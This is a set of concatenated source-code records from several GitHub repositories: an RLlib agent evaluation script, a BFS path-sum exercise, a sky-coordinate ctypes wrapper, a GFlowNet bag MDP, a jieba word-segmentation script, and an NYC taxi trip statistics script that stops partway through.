\"sequentialMode\": args.sequentialMode,\n \"add_penality\": args.add_penality,\n \"is_train\": not args.is_test,\n \"attack_strategy\": args.attack_strategy,\n \"break_tie\": args.break_tie,\n\n \"alpha\": args.alpha # tune.grid_search([0.05, 0.15, 0.25, 0.35, 0.45]),\n }})\n config.update({\n # \"gamma\": 0.5,\n # Use GPUs iff `RLLIB_NUM_GPUS` env var set to > 0.\n \"num_gpus\": 0, # 0.35,\n \"model\": {\n \"custom_action_dist\": \"graph_edgeEmb_pretrained_with_stop_dist\",\n \"custom_model\": \"autoedgeregressivedecouplediscretedgraph_model\",\n \"custom_model_config\": {\n \"use_graph_embedding\": True,\n \"transfer_func\": 'relu',\n 'similarity_func': 'attn',\n 'direct_logits': True,\n \"hidden_dim\": args.hidden_dim,\n \"filtration_order\": args.filtration_order,\n \"use_filtration\": tune.sample_from(lambda spec: spec.config.env_config.filtration_order != 0),\n \"with_stop_action\": args.with_stop_action,\n \"max_action\": args.max_action,\n \"with_SimulatedAnnealing\": args.with_SimulatedAnnealing,\n \"dataset_type\": args.dataset,\n \"max_num_node\": args.max_num_node,\n \"max_num_edge\": args.max_num_edge,\n },\n },\n\n # this to 0 will force rollouts to be done in the trainer actor.\n \"num_workers\": 2,\n # Number of environments to evaluate vectorwise per worker. This enables\n # model inference batching, which can improve performance for inference\n # bottlenecked workloads.\n \"num_envs_per_worker\": 2,\n\n \"num_gpus_per_worker\": 1,\n # \"num_gpus_per_worker\": 0.3,\n # #\n \"sgd_minibatch_size\": 200,\n \"num_sgd_iter\": 10, #tune.grid_search([1, 10, 20]),\n # \"num_sgd_iter\": 6, #tune.grid_search([1, 10, 20]),\n # \"num_workers\": 0,\n \"grad_clip\": 0.5, #tune.grid_search([40]),\n \"gamma\": 0.995, # tune.grid_search([0.99, 0.98, 0.97, 0.96, 0.95]),\n \"lambda\": 0.98, # tune.grid_search([0.99, 0.98, 0.97,]),\n \"clip_param\": 0.2, # tune.grid_search([0.1, 0.2]),\n \"rollout_fragment_length\": 10,\n \"explore\": False,\n\n \"lr\":7e-4,\n \"kl_coeff\": 0.5, #tune.grid_search([0.5, 1]),\n \"lr_schedule\": [\n [0,1e-4],\n [args.stop_timesteps, 1e-6],\n ],\n \"entropy_coeff_schedule\": [\n [0, 0.01],\n [args.stop_timesteps, 0.001],\n ],\n \"vf_loss_coeff\": 0.01, #tune.grid_search([1e-1, 1, 0.5]),\n \"entropy_coeff\": 0.01,\n # ppo or dcppo or tppo\n \"ppo_alg\": args.ppo_alg,\n # DPPO\n \"keep_local_weights_in_sync\": True,\n \"_disable_preprocessor_api\": args.disable_preprocessor_api,\n \"_separate_vf_optimizer\": args.separate_vf_optimizer,\n\n\n \"framework\": \"torch\",# if args.torch else \"tf\",\n })\n agent = DDPPOTrainer(config, env=\"env\")\n\n\n agent.restore(restore_path)\n\n # evaluate the trained model\n env = ParametricActionsEdgeGraph(config[\"env_config\"])\n\n seed = args.seed\n env.seed(seed)\n obs = env.reset()\n if args.test_num == -1:\n args.test_num = env.wrapped.data_len\n\n for i in range(args.test_num):\n episode_reward = 0\n # env.seed(seed)\n obs = env.reset()\n\n cnt = 0\n\n\n done = False\n rew_list = []\n\n while not done:\n\n a = agent.compute_single_action(obs)\n\n edge_index = env.wrapped.edge_index.copy()\n\n obs, reward, done, env_info = env.step(a)\n decoded_action = a[-2] // obs['num_edges'].shape[0], a[-2] % obs['num_edges'].shape[0], a[-1] // \\\n obs['num_edges'].shape[0], a[-1] % obs['num_edges'].shape[0]\n print(f'encoded action is [{a}], reward is {reward:.3f}')\n decoded_action = np.concatenate([edge_index[a[1]], edge_index[a[2]]]).tolist()\n print(f'decoded action is {decoded_action}')\n\n rew_list.append(reward)\n 
episode_reward += reward\n            cnt += 1\n\n        print('[%d] th episode reward is %f:' % (i, episode_reward))\n        print(np.cumsum(rew_list))\n\n    agent.cleanup()\n\n    del agent\n    del env\n\n    ray.shutdown()\n\n","repo_name":"yangysc/ResiNet","sub_path":"ray-master/rllib/examples/evaluate_trained_agent_dppo.py","file_name":"evaluate_trained_agent_dppo.py","file_ext":"py","file_size_in_byte":12664,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"7897147179","text":"from collections import deque\ndef bfs(i,j):\n    q = deque()\n    visited = [[0]*N for _ in range(N)]\n\n    q.append([i,j])\n    visited[i][j] = arr[i][j]\n\n    while q:\n        i, j = q.popleft()\n        for di, dj in [(-1,0),(1,0),(0,-1),(0,1)]:\n            ni = i + di ; nj = j + dj\n            if 0 <= ni < N and 0 <= nj < N:\n                tmp = visited[i][j] + arr[ni][nj]\n                # relax if unvisited, or if the new path sum is smaller than the stored one\n                if not visited[ni][nj] or tmp < visited[ni][nj]:\n                    q.append([ni, nj])\n                    visited[ni][nj] = tmp\n    return visited[N-1][N-1]  # minimum path sum to the bottom-right cell\n\nT = int(input())\nfor tc in range(1, T+1):\n    N = int(input())\n    arr = [list(map(int, input().split())) for _ in range(N)]\n    ans = bfs(0,0)  # start from the leftmost (top-left) cell\n    print(f'#{tc} {ans}')\n\n'''\n3\n3\n1 2 3\n2 3 4\n3 4 5\n4\n2 4 1 3\n1 1 7 1\n9 1 7 10\n5 7 2 4\n5\n6 7 1 10 2\n10 2 7 5 9\n9 3 2 9 6\n1 6 8 2 9\n8 3 8 2 1\n'''","repo_name":"Going777/Algorithm","sub_path":"SWEA/practice/최소합.py","file_name":"최소합.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1688091963","text":"# See the LICENSE file at the top-level directory of this distribution.\n\n\"\"\"Module to wrap sky coordinates for passing to processing functions.\"\"\"\n\nimport ctypes\n\ntry:\n    import astropy\n    import astropy.coordinates\nexcept ImportError:\n    astropy = None\n\nfrom .lib import Lib\nfrom .struct_wrapper import StructWrapper\n\n\nclass SkyCoord(StructWrapper):\n    \"\"\"Class to wrap sky coordinates for passing to processing functions.\"\"\"\n\n    def __init__(self, *args):\n        \"\"\"Create a new sky coordinate object.\n\n        The arguments are the coordinate type as a string,\n        and up to three coordinate values coord0, coord1, coord2.\n\n        Alternatively, an existing SkyCoord or an astropy SkyCoord object\n        can be passed instead.\n\n        The default epoch value is 2000.0, but can be set using\n        :meth:`set_epoch`.\n        \"\"\"\n        create_args = tuple()\n        if len(args) == 1:\n            if isinstance(args[0], SkyCoord):\n                other = args[0]\n                # Copy of an existing SkyCoord.\n                create_args = (\n                    other.type().encode(\"ascii\"),\n                    other.value(0),\n                    other.value(1),\n                    other.value(2),\n                )\n            elif astropy:\n                if isinstance(args[0], astropy.coordinates.SkyCoord):\n                    astropy_coord = args[0]\n                    if astropy_coord.frame.name == \"icrs\":\n                        create_args = (\n                            \"icrs\".encode(\"ascii\"),\n                            astropy_coord.ra.rad,\n                            astropy_coord.dec.rad,\n                            0.0,\n                        )\n                    else:\n                        raise RuntimeError(\"Unknown astropy coordinate frame\")\n            else:\n                raise RuntimeError(\n                    \"Unknown object passed to SkyCoord constructor\"\n                )\n        elif len(args) >= 3:\n            create_args = (\n                args[0].encode(\"ascii\"),\n                args[1],\n                args[2],\n                args[3] if len(args) >= 4 else 0.0,\n            )\n        else:\n            raise RuntimeError(\"Unknown construction method for SkyCoord\")\n        super().__init__(\n            Lib.sdp_sky_coord_create, create_args, Lib.sdp_sky_coord_free\n        )\n\n    def epoch(self) -> float:\n        \"\"\"Returns the value of the coordinate epoch\"\"\"\n        return Lib.sdp_sky_coord_epoch(self)\n\n    def value(self, dim: int) -> float:\n 
\"\"\"Returns the value of the selected coordinate.\n\n Args:\n dim: Coordinate dimension index (starting 0; max 2).\n\n Returns:\n Value of specified coordinate, or 0 if 'dim' is out of bounds.\n \"\"\"\n return Lib.sdp_sky_coord_value(self, dim)\n\n def set_epoch(self, epoch: float) -> None:\n \"\"\"Sets the coordinate epoch value.\n\n Args:\n epoch: Value of coordinate epoch.\n \"\"\"\n Lib.sdp_sky_coord_set_epoch(self, epoch)\n\n def type(self) -> str:\n \"\"\"Returns the coordinate type string\"\"\"\n return Lib.sdp_sky_coord_type(self).decode() # convert bytes to str\n\n\nLib.wrap_func(\n \"sdp_sky_coord_create\",\n restype=SkyCoord.handle_type(),\n argtypes=[\n ctypes.c_char_p,\n ctypes.c_double,\n ctypes.c_double,\n ctypes.c_double,\n ],\n)\n\nLib.wrap_func(\n \"sdp_sky_coord_free\",\n restype=None,\n argtypes=[SkyCoord.handle_type()],\n)\n\nLib.wrap_func(\n \"sdp_sky_coord_epoch\",\n restype=ctypes.c_double,\n argtypes=[SkyCoord.handle_type()],\n)\n\nLib.wrap_func(\n \"sdp_sky_coord_value\",\n restype=ctypes.c_double,\n argtypes=[SkyCoord.handle_type(), ctypes.c_int32],\n)\n\nLib.wrap_func(\n \"sdp_sky_coord_set_epoch\",\n restype=None,\n argtypes=[\n SkyCoord.handle_type(),\n ctypes.c_double,\n ],\n)\n\nLib.wrap_func(\n \"sdp_sky_coord_type\",\n restype=ctypes.c_char_p,\n argtypes=[SkyCoord.handle_type()],\n)\n","repo_name":"ska-telescope/ska-sdp-func","sub_path":"src/ska_sdp_func/utility/sky_coord.py","file_name":"sky_coord.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10996293488","text":"\"\"\"\n\n\"\"\"\nfrom collections import defaultdict, Counter\nimport copy\nimport functools\n\nimport torch\n\nfrom .. import network, utils\nfrom ..actor import Actor\nfrom .basemdp import BaseState, BaseMDP\n\nimport enum\nfrom dataclasses import dataclass\n\n\nclass BagState(BaseState):\n \"\"\" Bag / Multiset state, as Counter (dict) mapping {char: count}. \"\"\"\n def __init__(self, content, is_leaf=False):\n \"\"\" content: Counter (dict) mapping {char: count}. 
\"\"\"\n self.content = self.canonicalize(content)\n self.is_leaf = is_leaf\n\n def __repr__(self):\n sorted_chars = sorted(list(self.content.keys()))\n sortedbag = ''.join([k*self.content[k] for k in sorted_chars])\n return f'{sortedbag}-{self.is_leaf}'\n\n def __eq__(self, other):\n return self.content_equals(other) and self.is_leaf == other.is_leaf\n\n def __hash__(self):\n return hash(repr(self))\n\n def __len__(self):\n if len(self.content) == 0:\n return 0\n return sum(self.content.values())\n\n def max_group_size(self):\n if len(self.content) == 0:\n return 0\n return max(self.content.values())\n\n def canonicalize(self, content):\n return Counter(content) if type(content) != Counter else content\n\n def content_equals(self, other):\n for k, v in self.content.items():\n if v > 0:\n if k not in other.content:\n return False\n if other.content[k] != v:\n return False\n return True\n\n def is_member(self, other):\n if self.is_leaf:\n return self.__eq__(other)\n for k, v in self.content.items():\n if v > 0:\n if k not in other.content:\n return False\n if other.content[k] < v:\n return False\n return True\n\n \"\"\"\n Modifying state\n \"\"\"\n def _del(self, action):\n \"\"\" Construct new BagState, given BagAction.\n Return None if invalid action.\n \"\"\"\n if self.content[action.char] <= 0:\n return None\n new_content = copy.copy(self.content)\n new_content[action.char] = max(0, new_content[action.char] - 1)\n return BagState(new_content)\n\n def _add(self, action):\n \"\"\" Construct new BagState, given BagAction.\n Return None if invalid action.\n \"\"\"\n new_content = copy.copy(self.content)\n new_content[action.char] += 1\n return BagState(new_content)\n\n def _terminate(self):\n if not self.is_leaf:\n return BagState(self.content, is_leaf=True)\n else:\n return None\n \n def _unterminate(self):\n if self.is_leaf:\n return BagState(self.content, is_leaf=False)\n else:\n return None\n\nclass BagActionType(enum.Enum):\n # Forward actions\n Stop = enum.auto()\n AddChar = enum.auto()\n # Backward actions\n UnStop = enum.auto()\n RemoveChar = enum.auto()\n\n\n@dataclass\nclass BagAction:\n action: BagActionType\n char: str = None\n\n\nclass BagMDP(BaseMDP):\n \"\"\" MDP for building a bag or multiset, comprised of an alphabet 'ABCDEFG'.\n\n Action set is fixed and not a function of state.\n\n Forward actions: [stop, add A, add B, ..., add G]\n Reverse actions: [Unstop, remove A, remove B, ..., remove G]\n\n Cannot contain any CUDA elements: instance is passed\n to ray remote workers for substructure guidance, which need\n access to get_children & is_member.\n \"\"\"\n def __init__(self, args, alphabet = list('ABCDEFG')):\n self.args = args\n self.alphabet = alphabet\n self.alphabet_set = set(self.alphabet)\n self.substruct_size = 4\n self.forced_stop_len = 7\n\n self.fwd_actions = [BagAction(BagActionType.Stop)] + \\\n [BagAction(BagActionType.AddChar, c)\n for c in self.alphabet]\n self.back_actions = [BagAction(BagActionType.UnStop)] + \\\n [BagAction(BagActionType.RemoveChar, c)\n for c in self.alphabet]\n self.state = BagState\n self.parallelize_policy = False\n\n def root(self):\n return self.state([])\n\n @functools.cache\n def is_member(self, query, target):\n return query.is_member(target)\n\n \"\"\"\n Children, parents, and transition.\n Calls BaseMDP functions.\n Uses transition_fwd/back and get_fwd/back_actions.\n \"\"\"\n @functools.cache\n def get_children(self, state):\n return BaseMDP.get_children(self, state)\n\n @functools.cache\n def get_parents(self, state):\n 
return BaseMDP.get_parents(self, state)\n\n @functools.cache\n def get_unique_children(self, state):\n return BaseMDP.get_unique_children(self, state)\n\n @functools.cache\n def get_unique_parents(self, state):\n return BaseMDP.get_unique_parents(self, state)\n\n def has_stop(self, state):\n return len(state) == self.forced_stop_len\n\n def has_forced_stop(self, state):\n return len(state) == self.forced_stop_len\n\n def transition_fwd(self, state, action):\n \"\"\" Applies BagAction to state. Returns State or None (invalid transition). \n \n Action Types: Stop, AddChar\n \"\"\"\n if state.is_leaf:\n return None\n if self.has_forced_stop(state) and action.action != BagActionType.Stop:\n return None\n\n if action.action == BagActionType.Stop:\n if self.has_stop(state):\n return state._terminate()\n else:\n return None\n\n if action.action == BagActionType.AddChar:\n return state._add(action)\n \n def transition_back(self, state, action):\n \"\"\" Applies BagAction to state. Returns State or None (invalid transition). \n\n Action types: UnStop, RemoveChar \n \"\"\"\n if state == self.root():\n return None\n if state.is_leaf and action.action != BagActionType.UnStop:\n return None\n\n if action.action == BagActionType.UnStop:\n if state.is_leaf:\n return state._unterminate()\n else:\n return None\n\n if action.action == BagActionType.RemoveChar:\n return state._del(action)\n\n \"\"\"\n Actions\n \"\"\"\n def get_fwd_actions(self, state):\n \"\"\" Gets forward actions from state. Returns List of Actions.\n\n For many MDPs, this is independent of state. The num actions\n returned must match the policy's output dim. List of actions\n is used to associate policy output scores with states, so it\n must be in a consistent, deterministic order given state.\n \"\"\"\n return self.fwd_actions\n\n def get_back_actions(self, state):\n \"\"\" Gets backward actions from state. Returns List of Actions.\n\n For many MDPs, this is independent of state. The num actions\n returned must match the policy's output dim. List of actions\n is used to associate policy output scores with states, so it\n must be in a consistent, deterministic order given state.\n \"\"\"\n return self.back_actions\n\n\n\"\"\"\n Actor\n\"\"\"\nclass BagActor(Actor):\n \"\"\" Holds BagMDP and GPU elements: featurize & policies. \"\"\"\n def __init__(self, args, mdp):\n self.args = args\n self.mdp = mdp\n\n self.alphabet = mdp.alphabet\n self.char_to_idx = {a: i for (i, a) in enumerate(self.alphabet)}\n\n self.ft_dim = len(self.alphabet) + 2\n\n self.policy_fwd = super().make_policy(self.args.sa_or_ssr, 'forward')\n self.policy_back = super().make_policy(self.args.sa_or_ssr, 'backward')\n\n @functools.cache\n def featurize(self, state):\n \"\"\" Featurize BagState.\n\n Features\n - first len(alphabet) indices: count of that symbol\n - max count of symbol\n - (bool) max is >= substruct size\n \"\"\" \n embed = [0.] 
* len(self.alphabet)\n content = state.content\n for char, idx in self.char_to_idx.items():\n if char in content:\n embed[idx] = float(content[char])\n \n max_group_size = state.max_group_size()\n embed += [max_group_size]\n embed += [float(bool(max_group_size >= self.mdp.substruct_size))]\n return torch.tensor(embed, device = self.args.device)\n \n \"\"\"\n Networks\n \"\"\"\n def net_forward_sa(self):\n hid_dim = self.args.sa_hid_dim\n n_layers = self.args.sa_n_layers\n net = network.make_mlp(\n [self.ft_dim] + \\\n [hid_dim] * n_layers + \\\n [len(self.mdp.fwd_actions)]\n )\n return network.StateFeaturizeWrap(net, self.featurize)\n\n def net_backward_sa(self):\n hid_dim = self.args.sa_hid_dim\n n_layers = self.args.sa_n_layers\n net = network.make_mlp(\n [self.ft_dim] + \\\n [hid_dim] * n_layers + \\\n [len(self.mdp.back_actions)]\n )\n return network.StateFeaturizeWrap(net, self.featurize)\n \n def net_encoder_ssr(self):\n \"\"\" Featurized Bag State -> encoding. \"\"\"\n hid_dim = self.args.ssr_encoder_hid_dim\n n_layers = self.args.ssr_encoder_n_layers\n ssr_embed_dim = self.args.ssr_embed_dim\n net = network.make_mlp(\n [self.ft_dim] + \\\n [hid_dim] * n_layers + \\\n [ssr_embed_dim]\n )\n return network.StateFeaturizeWrap(net, self.featurize)\n\n def net_scorer_ssr(self):\n \"\"\" [encoding1, encoding2] -> scalar \"\"\"\n hid_dim = self.args.ssr_scorer_hid_dim\n n_layers = self.args.ssr_scorer_n_layers\n ssr_embed_dim = self.args.ssr_embed_dim\n return network.make_mlp(\n [2*ssr_embed_dim] + \\\n [hid_dim] * n_layers + \\\n [1]\n )\n\n","repo_name":"maxwshen/gflownet","sub_path":"gflownet/MDPs/bagmdp.py","file_name":"bagmdp.py","file_ext":"py","file_size_in_byte":9000,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"3941313878","text":"import jieba\nimport jieba.analyse\nimport pandas as pd\nimport csv\n\njieba.load_userdict('./senior project/jieba dict.txt')\ndf_articles_data = pd.read_csv('./senior project/趨勢king.csv')\narticles_data = df_articles_data['留言'].to_list()\nword_list = []\n\nfor i in articles_data:\n seg_list = jieba.lcut(i)\n stopwords = [line.strip() for line in open('./senior project/stopwords.txt', 'r', encoding='utf-8').readlines()]\n for word in seg_list:\n if word not in stopwords:\n if word != ' ':\n word_list.append(word)\n data_row = [word]\n with open('./senior project/split word done/趨勢king.csv', 'a', newline='', encoding='utf_8_sig') as f: \n csv_write = csv.writer(f)\n csv_write.writerow(data_row)\n with open('./senior project/split word done/趨勢king.txt', 'a', newline='', encoding='utf_8_sig') as f: \n csv_write = csv.writer(f)\n csv_write.writerow(data_row)\nprint(word_list) ","repo_name":"Wakamodoor/NTUT_theNewFinalProject","sub_path":"backend/jieba_split_word.py","file_name":"jieba_split_word.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16721339790","text":"# Big Data Inspection - NYC Taxi Trips\n# Ben Moeller - Dataset Group 4\n\nimport csv\nimport datetime\nfrom math import floor, radians, cos, sin, asin, sqrt\n\ndef haversine(lat1, lon1, lat2, lon2):\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 3956 # miles\n return c*r\n\ndef update_minmax(cmin, cmax, candidate):\n omin = cmin\n omax = cmax\n if candidate is None:\n return 
omin, omax\n if cmin is None or cmin > candidate:\n omin = candidate\n if cmax is None or cmax < candidate:\n omax = candidate\n return omin, omax\n\nfn = \"trip_data_4_skip.csv\"\nofn = \"trip_data_4_skip_output_new.csv\"\nf = open(fn, 'r')\nreader = csv.reader(f)\n\n# Get info about the headers and first row of data\nn = 0\nfor row in reader:\n print(row)\n n += 1\n if n > 5:\n break\n'''\n['medallion', ' hack_license', ' vendor_id', ' rate_code',\n' store_and_fwd_flag', ' pickup_datetime', ' dropoff_datetime',\n' passenger_count', ' trip_time_in_secs', ' trip_distance', ' pickup_longitude',\n' pickup_latitude', ' dropoff_longitude', ' dropoff_latitude']\n\n['91F6EB84975BBC867E32CB113C7C2CD5', 'AD8751110E6292079EB10EB9481FE1A6',\n'CMT', '1', 'N', '2013-04-04 18:47:45', '2013-04-04 19:00:25', '1', '759',\n'2.50', '-73.957855', '40.76532', '-73.976273', '40.785648']\n'''\n\n'''\n ID Col Name Value @ Row 1\n----------------------------------------------------------------\n 0 medallion 91F6EB84975BBC867E32CB113C7C2CD5\n 1 hack_license AD8751110E6292079EB10EB9481FE1A6\n 2 vendor_id CMT\n 3 rate_code 1\n 4 store_and_fwd_flag N\n 5 pickup_datetime 2013-04-04 18:47:45\n 6 dropoff_datetime 2013-04-04 19:00:25\n 7 passenger_count 1\n 8 trip_time_in_secs 759\n 9 trip_distance 2.50\n 10 pickup_longitude -73.957855\n 11 pickup_latitude 40.76532\n 12 dropoff_longitude -73.976273\n 13 dropoff_latitude 40.785648\n'''\n\nmindt = None\nmaxdt = None\n\nminlat = None\nmaxlat = None\nminlon = None\nmaxlon = None\n\navgpulat = 0\navgpulatc = 0\navgpulon = 0\navgpulonc = 0\n\navgdolat = 0\navgdolatc = 0\navgdolon = 0\navgdolonc = 0\n\navgodo = 0\navghav = 0\navgdistc = 0\n\nbin_width = 0.25 # Width of bins\noverflow = 15 # Distance at which we stop caring about individual bins\ndistance_bins = [0]*int((overflow/bin_width)+1) # Odometer distance\nhaversine_bins = [0]*int((overflow/bin_width)+1) # Haversine distance\n\nminodo = None\nmaxodo = None\nminhav = None\nmaxhav = None\n\nodoq1 = 1.0693\nodoq3 = 3.1883\n\nhavq1 = 0.7777\nhavq3 = 2.4579\n\noutlier_iqr_thresh = 1.5\n# Outliers are considered to be greater than Q3 + (IQR_THRESH * IQR)\n# or less than Q1 - (IQR_THRESH * IQR)\n\navgodo_noout = 0\navgodo_noout_c = 0\navgodo_outc = 0\navghav_noout = 0\navghav_noout_c = 0\navghav_outc = 0\n\nminrc = None\nmaxrc = None\n\nminpc = None\nmaxpc = None\n\nmintt = None\nmaxtt = None\n\nvid_values = {}\nrc_values = {}\nsaff_values = {}\npc_values = {}\n\npph = {}\nfor i in range(24):\n pph[str(i).zfill(2)] = {}\n\nodoiqr = None\nhaviqr = None\nif odoq1 is not None and odoq3 is not None:\n odoiqr = odoq3 - odoq1\nelse:\n avgodo_noout = \"Not Calculated\"\nif havq1 is not None and havq3 is not None:\n haviqr = havq3 - havq1\nelse:\n avghav_noout = \"Not Calculated\"\n\nn = -1\nprintevery = 100000\nfor row in reader:\n n += 1\n if n == 0:\n # Ignore header row since there's no data\n continue\n pudt = datetime.datetime.strptime(row[5], \"%Y-%m-%d %H:%M:%S\")\n if mindt is None or pudt < mindt:\n mindt = pudt\n dodt = datetime.datetime.strptime(row[6], \"%Y-%m-%d %H:%M:%S\")\n if maxdt is None or dodt > maxdt:\n maxdt = dodt\n if row[11] != '':\n pulat = float(row[11])\n if pulat is not None and pulat != 0 and 38.0293 < pulat < 42.65565:\n if maxlat is None:\n maxlat = pulat\n else:\n maxlat = max(maxlat, pulat)\n if minlat is None:\n minlat = pulat\n else:\n minlat = min(minlat, pulat)\n avgpulat = (avgpulat*avgpulatc + pulat) / (avgpulatc+1)\n avgpulatc += 1\n if row[10] != '':\n pulon = float(row[10])\n if pulon is not 
None and pulon != 0 and -78.47667 < pulon < -70.62036:\n if maxlon is None:\n maxlon = pulon\n else:\n maxlon = max(maxlon, pulon)\n if minlon is None:\n minlon = pulon\n else:\n minlon = min(minlon, pulon)\n avgpulon = (avgpulon*avgpulonc + pulon) / (avgpulonc+1)\n avgpulonc += 1\n if row[13] != '':\n dolat = float(row[13])\n if dolat is not None and dolat != 0 and 38.0293 < dolat < 42.65565:\n maxlat = max(maxlat, dolat)\n minlat = min(minlat, dolat)\n avgdolat = (avgdolat*avgdolatc + dolat) / (avgdolatc+1)\n avgdolatc += 1\n if row[12] != '':\n dolon = float(row[12])\n if dolon is not None and dolon != 0 and -78.47667 < dolon < -70.62036:\n maxlon = max(maxlon, dolon)\n minlon = min(minlon, dolon)\n avgdolon = (avgdolon*avgdolonc + dolon) / (avgdolonc+1)\n avgdolonc += 1\n\n # Trip Distance\n dist_bin = floor(float(row[9]) / bin_width)\n if float(row[9]) > overflow:\n dist_bin = int(overflow / bin_width)\n #print(dist_bin)\n distance_bins[dist_bin] += 1\n # Haversine Distance\n hav_dist = haversine(pulat, pulon, dolat, dolon)\n hav_bin = floor(hav_dist / bin_width)\n if hav_dist > overflow:\n hav_bin = int(overflow / bin_width)\n haversine_bins[hav_bin] += 1\n\n avgodo = (avgodo*avgdistc + float(row[9])) / (avgdistc+1)\n avghav = (avghav*avgdistc + hav_dist) / (avgdistc+1)\n avgdistc += 1\n\n if odoq1 is not None and odoq3 is not None:\n if (odoq1 - (outlier_iqr_thresh * odoiqr)) < float(row[9]) < (odoq3 + (outlier_iqr_thresh * odoiqr)):\n avgodo_noout = (avgodo_noout*avgodo_noout_c + float(row[9])) / (avgodo_noout_c+1)\n avgodo_noout_c += 1\n else:\n avgodo_outc += 1\n if havq1 is not None and havq3 is not None:\n if (havq1 - (outlier_iqr_thresh * haviqr)) < hav_dist < (havq3 + (outlier_iqr_thresh * haviqr)):\n avghav_noout = (avghav_noout*avghav_noout_c + hav_dist) / (avghav_noout_c+1)\n avghav_noout_c += 1\n else:\n avghav_outc += 1\n\n minodo, maxodo = update_minmax(minodo, maxodo, float(row[9]))\n minhav, maxhav = update_minmax(minhav, maxhav, hav_dist)\n\n minrc, maxrc = update_minmax(minrc, maxrc, int(row[3])) # Rate Code\n minpc, maxpc = update_minmax(minpc, maxpc, int(row[7])) # Passenger Count\n mintt, maxtt = update_minmax(mintt, maxtt, int(row[8])) # Trip Time\n\n # Passengers per hour\n # Get the current hour and date from the pickup datetime\n puhour = pudt.strftime(\"%H\")\n pudate = pudt.strftime(\"%Y-%m-%d\")\n #print(puhour)\n if pudate not in pph[puhour].keys():\n pph[puhour][pudate] = int(row[7])\n else:\n pph[puhour][pudate] += int(row[7])\n\n # Distinct Values\n # Vendor ID\n if row[2] == \"\":\n row[2] = \"NULL\"\n if row[2] not in vid_values.keys():\n vid_values[row[2]] = 1\n else:\n vid_values[row[2]] += 1\n\n # Rate Code\n if row[3] == \"\":\n row[3] = \"NULL\"\n if row[3] not in rc_values.keys():\n rc_values[row[3]] = 1\n else:\n rc_values[row[3]] += 1\n\n # Store and Forward Flag\n if row[4] == \"\":\n row[4] = \"NULL\"\n if row[4] not in saff_values.keys():\n saff_values[row[4]] = 1\n else:\n saff_values[row[4]] += 1\n\n # Passenger Count\n if row[7] == \"\":\n row[7] = \"NULL\"\n if row[7] not in pc_values.keys():\n pc_values[row[7]] = 1\n else:\n pc_values[row[7]] += 1\n\n if n % printevery == 0:\n print(n)\n\nmindtstr = mindt.strftime(\"%Y-%m-%d %H:%M:%S\")\nmaxdtstr = maxdt.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n#print(str(n)+\" rows in dataset\")\n#print(\"Datetime range covered: \"+mindtstr+\" to \"+maxdtstr)\n#print(\"Area covered: \"+str(minlat)+\", \"+str(minlon)+\" to \"+str(maxlat)+\", \"+str(maxlon))\n#print(\"Average pickup location: 
\"+str(avgpulat)+\", \"+str(avgpulon))\n#print(\"Average dropoff location: \"+str(avgdolat)+\", \"+str(avgdolon))\n#print(distance_bins)\n#print(haversine_bins)\n#print(pph)\n\navg_pph = {}\nfor hour in pph.keys():\n sum = 0\n count = 0\n for day in pph[hour].keys():\n sum += pph[hour][day]\n count += 1\n avg_pph[hour] = sum/count\n#print(avg_pph)\n\n# Get histogram quartiles\nodoq1calc = None\nodoq3calc = None\nq1_count = n/4\nq3_count = 3*n/4\nq1done = False\nfor i in range(int(overflow/bin_width)+1):\n if q1_count > distance_bins[i] and not q1done:\n q1_count -= distance_bins[i]\n elif q1done is not True:\n # Get the percentage of how far through the bin we are\n pct = q1_count / distance_bins[i]\n odoq1calc = (bin_width*i) + (pct*bin_width)\n q1done = True\n if q3_count > distance_bins[i]:\n q3_count -= distance_bins[i]\n else:\n pct = q3_count / distance_bins[i]\n odoq3calc = (bin_width*i) + (pct*bin_width)\n break\n\nhavq1calc = None\nhavq3calc = None\nq1_count = n/4\nq3_count = 3*n/4\nq1done = False\nfor i in range(int(overflow/bin_width)+1):\n if q1_count > haversine_bins[i] and not q1done:\n q1_count -= haversine_bins[i]\n elif q1done is not True:\n # Get the percentage of how far through the bin we are\n pct = q1_count / haversine_bins[i]\n havq1calc = (bin_width*i) + (pct*bin_width)\n q1done = True\n if q3_count > haversine_bins[i]:\n q3_count -= haversine_bins[i]\n else:\n pct = q3_count / haversine_bins[i]\n havq3calc = (bin_width*i) + (pct*bin_width)\n break\n\nwith open(ofn, 'w', newline='') as outcsv:\n writer = csv.writer(outcsv)\n writer.writerow([\"Records: \", n])\n writer.writerow([\"Datetime Range\"])\n writer.writerow([mindtstr, maxdtstr])\n\n writer.writerow([\"Area Range\"])\n writer.writerow([\"Min Lat\", \"Min Lon\", '', \"Max Lat\", \"Max Lon\"])\n writer.writerow([minlat, minlon, '', maxlat, maxlon])\n writer.writerow([\"Avg Odometer Distance: \", avgodo])\n writer.writerow([\"Avg Haversine Distance: \", avghav])\n writer.writerow([\"Avg Pickup\", '', '', \"Avg Dropoff\"])\n writer.writerow([avgpulat, avgpulon, '', avgdolat, avgdolon])\n\n writer.writerow([\"Avg Odometer Distance (No Outliers): \", avgodo_noout, \"Odo Outliers Found: \", avgodo_outc])\n writer.writerow([\"Avg Haversine Distance (No Outliers): \", avghav_noout, \"Hav Outliers Found: \", avghav_outc])\n\n writer.writerow([\"Distance Histogram\"])\n binlabels = list(range(int(overflow/bin_width)+1))\n binlabels = [bin_width * x for x in binlabels]\n writer.writerow(binlabels)\n writer.writerow(distance_bins)\n writer.writerow([\"Distance Q1\", \"Distance Q3\"])\n writer.writerow([odoq1calc, odoq3calc])\n writer.writerow([\"Haversine Histogram\"])\n writer.writerow(binlabels)\n writer.writerow(haversine_bins)\n writer.writerow([\"Haversine Q1\", \"Haversine Q3\"])\n 